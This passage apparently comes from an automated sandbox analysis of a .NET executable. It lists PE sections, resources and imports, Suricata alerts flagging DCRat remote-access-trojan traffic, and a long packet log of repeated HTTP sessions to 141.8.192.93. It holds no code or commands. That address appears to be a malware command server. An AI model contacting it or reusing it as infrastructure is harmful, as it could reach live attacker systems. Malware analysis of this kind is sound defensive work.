.rsrc	0x164000	0x218	0x400	a5d1451273a19779c5b9a1424477553a	False	0.2626953125	data	1.8390800949553323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x166000	0xc	0x200	e1766cd0128876f5d5a72c7a0db8a524	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x164058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-24T04:02:05.225882+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49708	141.8.192.93	80	TCP
2024-11-24T04:02:26.104737+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49732	141.8.192.93	80	TCP
2024-11-24T04:02:37.974159+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49759	141.8.192.93	80	TCP
2024-11-24T04:02:49.280812+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49786	141.8.192.93	80	TCP
2024-11-24T04:03:10.389897+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49836	141.8.192.93	80	TCP
2024-11-24T04:03:29.339694+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49878	141.8.192.93	80	TCP
2024-11-24T04:03:38.053776+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49897	141.8.192.93	80	TCP
2024-11-24T04:03:44.881860+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49913	141.8.192.93	80	TCP
2024-11-24T04:04:03.285144+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49955	141.8.192.93	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 04:02:03.715110064 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:03.834784985 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:03.834973097 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:03.836081982 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:03.955749989 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192620039 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192779064 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192797899 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192815065 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192841053 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192857981 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192873001 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192893028 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192908049 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.192925930 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.225882053 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.245865107 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.345923901 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.345952988 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.349898100 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.349917889 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.351183891 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.351322889 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.394423008 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.394725084 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.398737907 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.398883104 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.404788017 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.407269001 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.407418966 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.415455103 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.415584087 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.423897982 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.423949957 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.423979998 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.424068928 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.432204008 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.432333946 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.440532923 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.440648079 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.444309950 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.448950052 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.449057102 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.464880943 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.470813036 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.470834970 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.473860025 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.474884987 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.474994898 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.481822014 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.483335018 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.483417988 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.483705997 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.491703987 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.492039919 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.502156019 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.595733881 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.595813990 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.596920967 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.597055912 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.600377083 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.601296902 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.601422071 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.602796078 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.605660915 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.605798006 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.607455015 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.610024929 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.610081911 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.611529112 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.614407063 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.614599943 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:05.615876913 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.628359079 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:05.747859001 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.064641953 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.064680099 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.064740896 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.065773964 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.065891027 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.065943003 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.069916964 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.070046902 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.070286989 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.074080944 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.074212074 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.074311972 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.078238010 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.078349113 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.078408957 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.082386971 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.082523108 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.082623959 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.086538076 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.086651087 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.086699963 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.090704918 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.090816021 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.090872049 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.094865084 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.094958067 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.095010042 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.099004030 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.099134922 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.099186897 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.103180885 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.103334904 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.103388071 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.107321024 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.107439995 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.107498884 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.111495018 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.111607075 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.111694098 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.115652084 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.115756035 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.115998030 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.119827032 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.119899988 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.119956970 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.179660082 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.179722071 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.179954052 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.181629896 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.182454109 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.182517052 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.182566881 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.186572075 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.186697006 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.186953068 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.190773010 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.190860033 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.190892935 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.194902897 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.195044994 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.195112944 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.199081898 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.199140072 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.199198961 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.203242064 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.203361034 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.203373909 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.207367897 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.207442999 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.207509995 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.211524010 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.211633921 CET	80	49708	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:06.211678028 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:06.224494934 CET	49708	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:24.581548929 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:24.701199055 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:24.701312065 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:24.701626062 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:24.821110964 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104630947 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104671955 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104686975 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104712009 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104737043 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.104753017 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104763031 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.104772091 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104825974 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.104876041 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104892969 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104911089 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104927063 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.104943991 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.104964018 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.283762932 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.283783913 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.283868074 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.289256096 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.328691959 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.403099060 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.403115988 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.403183937 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.408643961 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.408660889 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.408723116 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449152946 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449170113 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449186087 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449209929 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449225903 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449243069 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449265957 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449264050 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449265003 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449282885 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449301958 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449307919 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449318886 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449335098 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449352980 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449367046 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449418068 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449434996 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449450970 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449482918 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449496984 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449528933 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449546099 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.449548006 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.449585915 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.522773981 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.522862911 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.524463892 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.526231050 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.526304007 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.526362896 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.531151056 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.531280041 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.532403946 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.539551020 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.539673090 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.540332079 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.569297075 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.569327116 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.569901943 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.573285103 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.573419094 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.573523045 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.581654072 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.581751108 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:26.584002018 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.626929998 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:26.746534109 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.073375940 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.073458910 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.073528051 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.074776888 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.074884892 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.074950933 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.080698967 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.080816984 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.080878973 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.086611986 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.086730957 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.086787939 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.092531919 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.092684984 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.092781067 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.098485947 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.098603964 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.098678112 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.104367018 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.156810999 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.187774897 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.187860012 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.188102961 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.189527035 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.189632893 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.189677954 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.195416927 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.195532084 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.195584059 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.201406956 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.201550961 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.201608896 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.207350969 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.207426071 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.207493067 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.213217020 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.213341951 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.213413000 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.219175100 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.219273090 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.219352007 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.225090981 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.225200891 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.225264072 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.230998039 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.231118917 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.231187105 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.236907005 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.237018108 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.237090111 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.242841005 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.242943048 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.243001938 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.248768091 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.248895884 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.248960018 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.254659891 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.297436953 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.302537918 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.302575111 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.302628994 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.304272890 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.304431915 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.304487944 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.310205936 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.310326099 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.310390949 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.316155910 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.316263914 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.316338062 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.322117090 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.322220087 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.322279930 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.327980995 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.328073025 CET	80	49732	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:27.328133106 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:27.330753088 CET	49732	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:36.497205019 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:36.616760969 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:36.616869926 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:36.623478889 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:36.742980957 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974050999 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974077940 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974088907 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974159002 CET	49759	80	192.168.2.5	141.8.192.93
